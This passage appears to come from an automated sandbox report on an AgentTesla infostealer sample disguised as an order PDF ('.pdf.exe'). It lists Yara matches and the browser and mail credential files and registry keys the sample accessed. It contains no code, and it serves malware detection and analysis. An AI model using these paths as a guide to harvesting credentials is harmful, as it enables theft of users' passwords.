Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match File source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.4294230.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.425ea10.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.4294230.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.425ea10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.915300159.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.657499770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.658122914.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.656873284.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.916801544.0000000002E62000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 7084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 4296, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Yara detected Credential Stealer
Source: Yara match File source: 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 4296, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match File source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.4294230.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.425ea10.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.4294230.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.425ea10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.915300159.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.657499770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.658122914.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.656873284.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.916801544.0000000002E62000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 7084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 4296, type: MEMORYSTR